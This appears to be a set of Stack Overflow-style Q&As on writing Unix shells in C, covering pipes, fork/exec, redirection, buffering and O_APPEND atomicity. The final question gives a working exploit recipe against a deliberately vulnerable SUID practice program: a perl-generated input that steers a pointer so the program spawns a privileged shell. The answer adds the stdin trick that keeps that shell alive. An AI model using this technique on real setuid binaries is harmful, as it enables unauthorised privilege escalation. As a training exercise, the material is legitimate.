Here's my code:
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <strings.h>
#include <sys/wait.h>
#include <readline/readline.h>
#define NUMPIPES 2
int main(int argc, char *argv[]) {
char *bBuffer, *sPtr, *aPtr = NULL, *pipeComms[NUMPIPES], *cmdArgs[10];
int fdPipe[2], pCount, aCount, i, status, lPids[NUMPIPES];
pid_t pid;
pipe(fdPipe);
while(1) {
bBuffer = readline("Shell> ");
if(!strcasecmp(bBuffer, "exit")) {
return 0;
}
sPtr = bBuffer;
pCount = -1;
do {
aPtr = strsep(&sPtr, "|");
pipeComms[++pCount] = aPtr;
} while(aPtr);
for(i = 0; i < pCount; i++) {
aCount = -1;
do {
aPtr = strsep(&pipeComms[i], " ");
cmdArgs[++aCount] = aPtr;
} while(aPtr);
cmdArgs[aCount] = 0;
if(strlen(cmdArgs[0]) > 0) {
pid = fork();
if(pid == 0) {
if(i == 0) {
close(fdPipe[0]);
dup2(fdPipe[1], STDOUT_FILENO);
close(fdPipe[1]);
} else if(i == 1) {
close(fdPipe[1]);
dup2(fdPipe[0], STDIN_FILENO);
close(fdPipe[0]);
}
execvp(cmdArgs[0], cmdArgs);
exit(1);
} else {
lPids[i] = pid;
/*waitpid(pid, &status, 0);
if(WIFEXITED(status)) {
printf("[%d] TERMINATED (Status: %d)\n",
pid, WEXITSTATUS(status));
}*/
}
}
}
for(i = 0; i < pCount; i++) {
waitpid(lPids[i], &status, 0);
if(WIFEXITED(status)) {
printf("[%d] TERMINATED (Status: %d)\n",
lPids[i], WEXITSTATUS(status));
}
}
}
return 0;
}
(The code was updated to reflect the changes proposed by two answers below; it still doesn't work as it should...)
Here's the test case where this fails:
nazgulled ~/Projects/SO/G08 $ ls -l
total 8
-rwxr-xr-x 1 nazgulled nazgulled 7181 2009-05-27 17:44 a.out
-rwxr-xr-x 1 nazgulled nazgulled 754 2009-05-27 01:42 data.h
-rwxr-xr-x 1 nazgulled nazgulled 1305 2009-05-27 17:50 main.c
-rwxr-xr-x 1 nazgulled nazgulled 320 2009-05-27 01:42 makefile
-rwxr-xr-x 1 nazgulled nazgulled 14408 2009-05-27 17:21 prog
-rwxr-xr-x 1 nazgulled nazgulled 9276 2009-05-27 17:21 prog.c
-rwxr-xr-x 1 nazgulled nazgulled 10496 2009-05-27 17:21 prog.o
-rwxr-xr-x 1 nazgulled nazgulled 16 2009-05-27 17:19 test
nazgulled ~/Projects/SO/G08 $ ./a.out
Shell> ls -l|grep prog
[4804] TERMINATED (Status: 0)
-rwxr-xr-x 1 nazgulled nazgulled 14408 2009-05-27 17:21 prog
-rwxr-xr-x 1 nazgulled nazgulled 9276 2009-05-27 17:21 prog.c
-rwxr-xr-x 1 nazgulled nazgulled 10496 2009-05-27 17:21 prog.o
The problem is that I should return to my shell after that: I should see "Shell> " waiting for more input. You can also notice that there is no second message similar to "[4804] TERMINATED (Status: 0)" (with a different pid), which means the second process didn't terminate.
I think it has something to do with grep, because this works:
nazgulled ~/Projects/SO/G08 $ ./a.out
Shell> echo q|sudo fdisk /dev/sda
[4838] TERMINATED (Status: 0)
The number of cylinders for this disk is set to 1305.
There is nothing wrong with that, but this is larger than 1024,
and could in certain setups cause problems with:
1) software that runs at boot time (e.g., old versions of LILO)
2) booting and partitioning software from other OSs
(e.g., DOS FDISK, OS/2 FDISK)
Command (m for help):
[4839] TERMINATED (Status: 0)
You can easily see two "terminate" messages...
So, what's wrong with my code?
Even after the first command of your pipeline exits (and thus closes stdout=~fdPipe[1]), the parent still has fdPipe[1] open.
Thus, the second command of the pipeline has a stdin=~fdPipe[0] that never gets an EOF, because the other endpoint of the pipe is still open.
You need to create a new pipe(fdPipe) for each |, and make sure to close both endpoints in the parent; i.e.
for cmd in cmds
if there is a next cmd
pipe(new_fds)
fork
if child
if there is a previous cmd
dup2(old_fds[0], 0)
close(old_fds[0])
close(old_fds[1])
if there is a next cmd
close(new_fds[0])
dup2(new_fds[1], 1)
close(new_fds[1])
exec cmd || die
else
if there is a previous cmd
close(old_fds[0])
close(old_fds[1])
if there is a next cmd
old_fds = new_fds
if there are multiple cmds
close(old_fds[0])
close(old_fds[1])
Also, to be safer, you should handle the case of fdPipe and {STDIN_FILENO,STDOUT_FILENO} overlapping before performing any of the close and dup2 operations. This may happen if somebody has managed to start your shell with stdin or stdout closed, and will result in great confusion with the code here.
Edit
fdPipe1 fdPipe3
v v
cmd1 | cmd2 | cmd3 | cmd4 | cmd5
^ ^
fdPipe2 fdPipe4
In addition to making sure you close the pipe's endpoints in the parent, I was trying to make the point that fdPipe1, fdPipe2, etc. cannot be the same pipe().
/* suppose stdin and stdout have been closed...
* for example, if your program was started with "./a.out <&- >&-" */
close(0), close(1);
/* then the result you get back from pipe() is {0, 1} or {1, 0}, since
* fd numbers are always allocated from the lowest available */
pipe(fdPipe);
close(0);
dup2(fdPipe[0], 0);
I know you don't use close(0) in your present code, but the last paragraph is warning you to watch out for this case.
Edit
The following minimal change to your code makes it work in the specific failing case you mentioned:
@@ -12,6 +12,4 @@
pid_t pid;
- pipe(fdPipe);
-
while(1) {
bBuffer = readline("Shell> ");
@@ -29,4 +27,6 @@
} while(aPtr);
+ pipe(fdPipe);
+
for(i = 0; i < pCount; i++) {
aCount = -1;
@@ -72,4 +72,7 @@
}
+ close(fdPipe[0]);
+ close(fdPipe[1]);
+
for(i = 0; i < pCount; i++) {
waitpid(lPids[i], &status, 0);
This won't work for more than one command in the pipeline; for that, you'd need something like this: (untested, as you have to fix other things as well)
@@ -9,9 +9,7 @@
int main(int argc, char *argv[]) {
char *bBuffer, *sPtr, *aPtr = NULL, *pipeComms[NUMPIPES], *cmdArgs[10];
- int fdPipe[2], pCount, aCount, i, status, lPids[NUMPIPES];
+ int fdPipe[2], fdPipe2[2], pCount, aCount, i, status, lPids[NUMPIPES];
pid_t pid;
- pipe(fdPipe);
-
while(1) {
bBuffer = readline("Shell> ");
@@ -32,4 +30,7 @@
aCount = -1;
+ if (i + 1 < pCount)
+ pipe(fdPipe2);
+
do {
aPtr = strsep(&pipeComms[i], " ");
@@ -43,11 +44,12 @@
if(pid == 0) {
- if(i == 0) {
- close(fdPipe[0]);
+ if(i + 1 < pCount) {
+ close(fdPipe2[0]);
- dup2(fdPipe[1], STDOUT_FILENO);
+ dup2(fdPipe2[1], STDOUT_FILENO);
- close(fdPipe[1]);
- } else if(i == 1) {
+ close(fdPipe2[1]);
+ }
+ if(i != 0) {
close(fdPipe[1]);
@@ -70,4 +72,17 @@
}
}
+
+ if (i != 0) {
+ close(fdPipe[0]);
+ close(fdPipe[1]);
+ }
+
+ fdPipe[0] = fdPipe2[0];
+ fdPipe[1] = fdPipe2[1];
+ }
+
+ if (pCount) {
+ close(fdPipe[0]);
+ close(fdPipe[1]);
}
You should have an error exit after execvp() - it will fail sometime.
exit(EXIT_FAILURE);
As @uncleo points out, the argument list must have a null pointer to indicate the end:
cmdArgs[aCount] = 0;
It is not clear to me that you let both programs run free - it appears that you require the first program in the pipeline to finish before starting the second, which is not a recipe for success if the first program blocks because the pipe is full.
Jonathan has the right idea. You rely on the first process to fork all the others. Each one has to run to completion before the next one is forked.
Instead, fork the processes in a loop like you are doing, but wait for them outside the inner loop, (at the bottom of the big loop for the shell prompt).
loop //for prompt
next prompt
loop //to fork tasks, store the pids
if pid == 0 run command
else store the pid
end loop
loop // on pids
wait
end loop
end loop
I think your forked processes will continue executing.
Try either:
changing it to 'return execvp(...)', or
adding 'exit(1);' after execvp.
One potential problem is that cmdArgs may have garbage at the end of it. You're supposed to terminate that array with a null pointer before passing it to execvp().
It looks like grep is accepting STDIN, though, so that might not be causing any problems (yet).
The file descriptors from the pipe are reference counted, and the count is incremented with each fork. After every fork, you have to close both descriptors in each process in order to bring the reference count to zero and allow the pipe to close. I'm guessing.
Related
I have a problem with an execve pipeline. I split a command on the pipe symbol and send the pieces to a function one by one. I call fork, dup2 and close. The whole command executes, but the output of the last command is sent to the terminal and to readline, so readline treats that output as the next command. For example, when I run ls | wc, the output is 8; then I get the error that 8 is not a command, followed by a segfault.
while (++i < nproc)
{
rdl->main_str = ft_strdup(rdl->pipe_str[i]);
rdl->len = ft_strlen(rdl->pipe_str[i]);
parser(rdl);
command(rdl); // => run a pipe_exec function
token_clear(&rdl->token);
free(rdl->main_str);
printf("*****************\n");
}
while (nproc-- > 0)
waitpid(-1, 0, 0);
#define READ 0
#define WRITE 1
static void ft_fatality(void)
{
ft_putstr_fd("error: fatal\n", 2);
exit(1);
}
// static void ft_exec_error(char *str)
// {
// ft_putstr_fd("error: cannot execute ", 2);
// ft_putstr_fd(str, 2);
// ft_putstr_fd("\n", 2);
// exit(1);
// }
static void ft_openpipes(int fd[2])
{
if (close(fd[READ]) == -1)
ft_fatality();
if (dup2(fd[WRITE], STDOUT_FILENO) == -1)
ft_fatality();
if (close(fd[WRITE]) == -1)
ft_fatality();
}
static void ft_closepipes(int fd[2])
{
if (dup2(fd[READ], STDIN_FILENO) == -1)
ft_fatality();
if (close(fd[READ]) == -1)
ft_fatality();
if (close(fd[WRITE]) == -1)
ft_fatality();
}
int pipe_exec(t_command command)
{
printf("pipe_exec\n");
printf("pipe_exec command count %d\n", command.count);
int i;
int j;
int fd[2];
int type_size;
int size;
int result;
char *arg;
char *path;
char **type;
pid_t pid;
i = -1;
j = 1;
result = 0;
size = token_size(command.tokens);
type_size = 0;
arg = ft_strdup("");
if (pipe(fd) == -1)
ft_fatality();
while (++i < size)
{
if (command.tokens->type_id == 12)
type_size++;
get_next_token(&command.tokens);
}
i = -1;
path = command_find_path(command.keyword);
type = (char **)malloc(sizeof(char *) * ((type_size + 1) + 2));
type[0] = ft_strdup(path);
while (++i < size)
{
if (command.tokens->type_id == 13 || command.tokens->type_id == 7)
{
arg = ft_strjoin(arg, command.tokens->context);
printf("arg %s\n", arg);
}
if (command.tokens->type_id == 12 || size - 1 == command.tokens->id)
{
type[j++] = ft_strdup(arg);
arg = ft_strdup("");
}
get_next_token(&command.tokens);
}
type[j] = NULL;
j = -1;
while (type[++j])
{
printf("type : %s\n", type[j]);
}
pid = fork();
// signal(SIGINT, proc_signal_handler);
if (pid < 0)
return (-1);
if (pid == 0)
{
ft_openpipes(fd);
result = execve(path, type, g_env.env);
}
else
ft_closepipes(fd);
if (result == -1)
return (1);
waitpid(pid, 0, 0);
command.fd[0] = fd[0];
command.fd[1] = fd[1];
free(arg);
ft_free_dbl_str(type);
free(path);
return (0);
}
bash % ./minishell
->ls | wc -l
-------------------
ls token->type->context keyword token->type->id 0 token->t_flag 0
| token->type->context pipe token->type->id 6 token->t_flag 6
wc token->type->context keyword token->type->id 0 token->t_flag 0
l token->type->context arg token->type->id 13 token->t_flag -1
-------------------
-------------------
ls token->type->context keyword token->type->id 0 token->t_flag 0
-------------------
pipe_exec
pipe_exec command count 1
type : /bin/ls
*****************
-------------------
wc token->type->context keyword token->type->id 0 token->t_flag 0
- token->type->context option token->type->id 7 token->t_flag 5
l token->type->context arg token->type->id 13 token->t_flag -1
-------------------
pipe_exec
pipe_exec command count 2
arg -
arg -l
type : /usr/bin/wc
type : -l
*****************
-> 8
-------------------
8 token->type->context string token->type->id 12 token->t_flag -1
token->type->context string token->type->id 12 token->t_flag -1
-------------------
bash: 8: command not found
-> zsh: segmentation fault ./minishell
Your ft_closepipes() function dupes the read end of the pipe onto STDIN_FILENO. You execute that in the parent process, which causes exactly the effect you describe. The parent's standard input is redirected to the read end of the (current) pipe.
That happens to work out ok for the processes in the pipeline (but see below), because they each inherit their standard input from their parent, and you start them in order from left to right. But it leaves the shell itself consuming the output of the last process as its own input.
And that brings up the other point: your ft_openpipes() function redirects the caller's standard output to the specified pipe, but you don't want to do that for the last process in the pipeline. It was a bit fortuitous to combine that error with the other, however, because it made very clear what the nature of the problem is.
For the parent, one alternative would be to dupe the standard input FD before setting up the pipeline, to preserve it, then dupe it back afterward. That would be a relatively easy retrofit, but I think it's poor form. Although you would need more of a rework to accomplish it, better would be to avoid ever redirecting the parent's file descriptors at all.
As for the segfault, that's probably a result of the child process returning to the caller of pipe_exec() in the event that its execve() call returns. It ought instead to terminate, just as would (eventually) happen if it had successfully started the requested program. Personally, I would go with something like this:
// ...
result = execve(path, type, g_env.env);
assert(result == -1);
perror(path);
_exit(EXIT_FAILURE);
I am writing my own shell. I am facing a problem with commands like C1 | C2 > file or C1 | C2 >> file. When I execute a command like ls | grep .c > a.txt, I get the result of ls | grep only when I terminate the program, but I want to get it during execution.
Code from main.c:
if (countPipes == 1 && strstr(userInput, ">>") != NULL){
token = NULL;
resetC(cmd);
resetC(cmdPipe);
token = strtok(userInput, ">>");
char *piped = strdup(token);
token = strtok(NULL, ">>");
char *file = strdup(token);
file = skipwhite(file);
token = strtok(piped, "|");
c1 = strdup(token);
token = strtok(NULL, "|");
c2 = strdup(token);
c2 = skipwhite(c2);
splitCommands(c1, cmd);
splitCommands(c2, cmdPipe);
execPipedCommandsRed(cmd, cmdPipe, file);
memset(userInput, '\0', 1000);
}
Code from functions.c:
void execPipedCommandsRed(char **cmd, char **cmdPiped, char *file){
int pipeOne[2], status, ret_val, s;
status = pipe(pipeOne);
if (status < 0) {
exit(-1);
}
int k;
int e = dup(1);
pid_t p1, p2, w;
int s2 = dup(1);
p1 = fork();
if (p1 < 0) {
printf("Fork failed!\n");
}
if (p1 == 0) {
close(pipeOne[READ]);
dup2(pipeOne[WRITE], STDOUT_FILENO);
close(pipeOne[WRITE]);
if (execvp(cmd[0], cmd) < 0) {
perror("Lathos");
}
} else {
p2 = fork();
if (p2 < 0) {
printf("Fork failed\n");
}
if (p2 == 0) {
close(pipeOne[WRITE]);
dup2(pipeOne[READ], STDIN_FILENO);
close(pipeOne[READ]);
k = open(file, O_WRONLY| O_APPEND | O_CREAT, 0644);
if (k < 0) {
puts("error k");
}
dup2(k, 1);
close(k);
if (execvp(cmdPiped[0], cmdPiped) < 0) {
perror("Lathos!");
}
} else {
// parent is waiting
waitpid(-1, &s, WUNTRACED | WCONTINUED);
printBash();
}
}
}
When I execute a command like ls | grep .c > a.txt, I get the result of ls | grep only when I terminate the program.
The traditional POSIX/Unix behaviour is that stdout is line-buffered only when it goes to a terminal (isatty returns 1); otherwise it is fully (block) buffered. See setvbuf for descriptions of the buffering modes.
If you'd like matching files to be output into stdout as they are found, instead of ls | grep .c > a.txt use the following command:
stdbuf --output=L find -maxdepth 1 -name "*.c" > a.txt
stdbuf allows you to explicitly specify the desired buffering mode, and find outputs one filename per line, unlike plain ls.
You can still use ls and grep, but that is sub-optimal in the number of processes involved, and each process must have its output buffering specified explicitly:
stdbuf --output=L ls -1 | stdbuf --output=L egrep '\.c$' > a.txt
Notes:
stdbuf only affects the C standard streams, and some heavily optimised applications may not use the C standard streams at all, in which case stdbuf has no effect.
grep .c matches anything that has the character c at a non-zero position (the . matches any character), whereas find -name "*.c" matches only files with the .c extension; so does egrep '\.c$'.
ls may output multiple files per line, but the grep filter expects one file per line; ls -1 outputs one file per line.
So I was required to solve this exercise:
This exercise is designed to demonstrate why the atomicity guaranteed by opening a file with the O_APPEND flag is necessary. Write a program that takes up to three command-line arguments:
$ atomic_append filename num-bytes [x]
The program should open the specified filename (creating it if necessary) and append num-bytes bytes to the file by using write() to write a byte at a time. By default, the program should open the file with the O_APPEND flag, but if a third command-line argument (x) is supplied, then the O_APPEND flag should be omitted, and instead the program should perform an lseek(fd, 0, SEEK_END) call before each write(). Run two instances of this program at the same time without the x argument to write 1 million bytes to the same file:
$ atomic_append f1 1000000 & atomic_append f1 1000000
Repeat the same steps, writing to a different file, but this time specifying the x argument:
$ atomic_append f2 1000000 x & atomic_append f2 1000000 x
List the sizes of the files f1 and f2 using ls -l and explain the difference.
So this is what I wrote:
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
int main(int argc, char *argv[]) {
int fd, flags, num_bytes;
if (argc < 3 || strcmp(argv[1], "--help") == 0) {
printf("Usage: %s filename num-bytes [x]\n", argv[0]);
return 1;
}
num_bytes = atoi(argv[2]);
if (argc == 4 && strcmp(argv[3], "x") == 0) {
fd = open(argv[1], O_CREAT | O_WRONLY, 0666);
if (fd == -1)
perror("open");
while (num_bytes-- > 0) {
lseek(fd, 0, SEEK_END);
write(fd, "a", 1);
}
if (close(fd) == -1)
perror("close");
}
else {
fd = open(argv[1], O_CREAT | O_APPEND | O_WRONLY, 0666);
if (fd == -1)
perror("open");
while(num_bytes-- > 0)
write(fd, "a", 1);
if (close(fd) == -1)
perror("close");
}
return 0;
}
Now after I ran it as required:
abhinav@cr33p:~/System/5$ ./a.out f1 1000000 & ./a.out f1 1000000
[1] 4335
[1]+ Done ./a.out f1 1000000
abhinav@cr33p:~/System/5$ ./a.out f2 1000000 x & ./a.out f2 1000000 x
[1] 4352
[1]+ Done ./a.out f2 1000000 x
abhinav@cr33p:~/System/5$ ls f1 f2
f1 f2
abhinav@cr33p:~/System/5$ ls -l f*
-rw-rw-r-- 1 abhinav abhinav 2000000 Dec 10 16:23 f1
-rw-rw-r-- 1 abhinav abhinav 1000593 Dec 10 16:24 f2
There is definitely a difference in the file sizes, but I am somewhat unable to understand why. I searched and found this explanation somewhere:
The sizes were definitely different:
-rw------- 1 posborne posborne 1272426 2012-01-15 21:31 test2.txt
-rw------- 1 posborne posborne 2000000 2012-01-15 21:29 test.txt
Where test2.txt was run without O_APPEND. test2.txt is short by the
number of times (or bytes as a result of times) that seeking to the
end of the file did not happen at the same time as the write (quite
frequently).
But it does not seem to make any sense. So why the difference in sizes?
This code, run on a file not opened with O_APPEND:
while (num_bytes-- > 0) {
lseek(fd, 0, SEEK_END);
write(fd, "a", 1);
writes to the location of the end of the file as it was when the call to lseek() was made. The end of the file can change in the time between the lseek() and write() call.
This code, on a file that was opened with O_APPEND:
while(num_bytes-- > 0)
write(fd, "a", 1);
is guaranteed by the standard behavior of write()'ing to a file opened with O_APPEND to write to the end of the file no matter where that end is.
That's the entire point of the O_APPEND flag - a separate lseek() followed by write() is not atomic, so it doesn't work.
I am having an issue that seems to be just beyond my knowledge. I am writing a simple shell to learn some systems programming for an upcoming internship with Unisys. In my shell, all of the commands I try seem to work except ls and, as I have now discovered, wc. ls and wc work when typed by themselves, but if I give either of them arguments, it fails and gives me an error saying No such file or directory.
here is my code:
#include <sys/types.h>
#include <sys/wait.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sysexits.h>
#include <unistd.h>
#define BUF_SIZE 1024
#define DELIMS " -\r\t\n"
/****************************************************************
* Capture input from the user. Returns the input from the
* standard input file descriptor.
***************************************************************/
char * getInput (char **buffer, size_t buflen)
{
size_t bufsize = BUF_SIZE;
*buffer = malloc(sizeof(char) * bufsize + 1); // allocate space for the buffer
if (!*buffer)
{
fprintf(stderr, "Shell: buffer allocation error\n");
exit(EXIT_FAILURE);
}
printf("$$ ");
fflush(NULL);
int bytesRead = getline(&(*buffer), &bufsize, stdin);
if (bytesRead < 0)
{
printf("Getline error\n");
exit(EXIT_FAILURE);
}
return *buffer; // Not capturing return value right now
}
/****************************************************************
* Tokenize the buffer input from stdin
***************************************************************/
char ** splitLine(char *line)
{
int bufsize = BUF_SIZE;
int pos = 0;
char **tokens = malloc (sizeof(char) * BUF_SIZE + 1);
char *token;
if (!tokens)
{
fprintf(stderr, "Shell: buffer allocation error\n");
exit(EXIT_FAILURE);
}
/* Tokenize the line */
token = strtok(line, DELIMS);
while (token != NULL)
{
tokens[pos] = token;
pos++;
if (pos > bufsize)
{
bufsize += BUF_SIZE;
tokens = realloc(tokens, bufsize * sizeof(char) + 1);
if (!tokens)
{
fprintf(stderr, "Shell: buffer allocation error\n");
exit(EXIT_FAILURE);
}
}
token = strtok(NULL, DELIMS); // continue grabbing tokens
}
tokens[pos] = NULL;
return tokens;
}
/****************************************************************
* Main function
***************************************************************/
int main (int argc, char **argv)
{
char *buf; // buffer to hold user input from standard input stream.
pid_t pid; // Parent id of the current process
int status;
/* Loop while the user is getting input */
while (getInput(&buf, sizeof(buf)))
{
char **args = splitLine(buf);
int i = 0;
/* Print tokens just to check if we are processing them correctly */
while (1)
{
char *token = args[i++];
if (token != NULL)
printf("Token #%d: %s\n", i, token);
else
break;
}
fflush(NULL);
/* Fork and execute command in the shell */
pid = fork();
switch(pid)
{
case -1:
{
/* Failed to fork */
fprintf(stderr, "Shell cannot fork: %s\n", strerror(errno));
continue;
}
case 0:
{
/* Child so run the command */
execvp(args[0], args); // Should not ever return otherwise there was an error
fprintf(stderr, "Shell: couldn't execute %s: %s\n ", buf, strerror(errno));
exit(EX_DATAERR);
}
}
/* Suspend execution of calling process until receiving a status message from the child process
or a signal is received. On return of waitpid, status contains the termination
information about the process that exited. The pid parameter specifies the set of child
process for which to wait for */
if ((pid = waitpid(pid, &status, 0) < 0))
{
fprintf(stderr, "Shell: waitpid error: %s\n", strerror(errno));
}
free(args);
}
free(buf);
exit(EX_OK);
}
For example, I have tried the following commands with output:
ls -la (THE ISSUE)
$$ ls -la
Token #1: ls
Token #2: la
ls: la: No such file or directory
$$
wc -l (THE ISSUE)
$$ wc -l
Token #1: wc
Token #2: l
wc: l: open: No such file or directory
ls
$$ ls
Token #1: ls
Makefile driver driver.dSYM main.c main.o
$$
ps -la
$$ ps -la
Token #1: ps
Token #2: la
UID PID PPID CPU PRI NI VSZ RSS WCHAN STAT TT TIME COMMAND
0 2843 2405 0 31 0 2471528 8 - Us s000 0:00.08 login
501 2845 2843 0 31 0 2463080 1268 - S s000 0:01.08 -bash
501 4549 2845 0 31 0 2454268 716 - S+ s000 0:00.01 ./driv
0 4570 4549 0 31 0 2435020 932 - R+ s000 0:00.00 ps la
$$
which which
$$ which which
Token #1: which
Token #2: which
/usr/bin/which
which -a which
$$ which -a which
Token #1: which
Token #2: a
Token #3: which
/usr/bin/which
and even finally man getline
GETLINE(3) BSD Library Functions Manual GETLINE(3)
NAME
getdelim, getline -- get a line from a stream
LIBRARY
Standard C Library (libc, -lc)
.
.
.
Can anybody help me point out why I am having this issue?
You've added "-" as a word separator in the DELIMS macro.
Removing it should fix your problem.
As an aside, it's probably best to avoid macros where you can do so easily. Here, I would have used a const char* delims to store the separators. I usually find it easier to declare a variable close to where it's used - I think that makes it easier to spot bugs and read the code.
I am trying to exploit a SUID program.
The program is:
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#define e(); if(((unsigned int)ptr & 0xff000000)==0xca000000) { setresuid(geteuid(), geteuid(), geteuid()); execlp("/bin/sh", "sh", "-i", NULL); }
void print(unsigned char *buf, int len)
{
int i;
printf("[ ");
for(i=0; i < len; i++) printf("%x ", buf[i]);
printf(" ]\n");
}
int main()
{
unsigned char buf[512];
unsigned char *ptr = buf + (sizeof(buf)/2);
unsigned int x;
while((x = getchar()) != EOF) {
switch(x) {
case '\n': print(buf, sizeof(buf)); continue; break;
case '\\': ptr--; break;
default: e(); if(ptr > buf + sizeof(buf)) continue; ptr++[0] = x; break;
}
}
printf("All done\n");
}
We can easily see that if we somehow change ptr's contents to some address that starts with CA, then a new shell will be spawned for us. And as ptr normally holds some address starting with FF, the way to decrease ptr is to enter the \ character. So I make a file with 0x35000000 '\' characters, and finally three 'a' characters at the end of the file:
perl -e "print '\\\'x889192448" > file # decimal equivalent of 0x35000000
echo aaa >> file # So that e() is called, which actually spawns the shell
And finally in gdb,
run < file
However instead of spawning a shell gdb is saying
process <some number> is executing new program /bin/dash
inferior 1 exited normally
And then back to gdb prompt instead of getting a shell.
I have confirmed by setting breakpoints at appropriate locations that ptr is indeed starting with CA before setresuid() gets called.
Also if I pipe this outside of gdb, nothing happens.
./vulnProg < file
Bash prompt returns back.
Please tell me where am I making mistake.
You can see the problem by compiling a simpler test program
#include <unistd.h>
int main() { execlp("/bin/sed", "sed", "-e", "s/^/XXX:/", (char *)NULL); }
All this does is start a version of sed (rather than the shell) and converts input by prepending "XXX:".
If you run the resulting program, and type in the Terminal you get behaviour like this:
$./a.out
Hello
XXX:Hello
Test
XXX:Test
^D
Which is exactly as we'd expect.
Now if you feed it input from a file containing "Hello\nWorld" you get
$./a.out < file
XXX:Hello
XXX:World
$
And the application exits immediately, with the input stream to the application being closed when the input file has all been read.
If you want to provide additional input, you need to use a trick to not break the input stream.
{ cat file ; cat - ; } | ./a.out
This will put all the input from file into a running ./a.out and then
read from stdin and add that too.
$ { cat file ; cat - ; } | ./a.out
XXX:Hello
XXX:World
This is a Test
XXX:This is a Test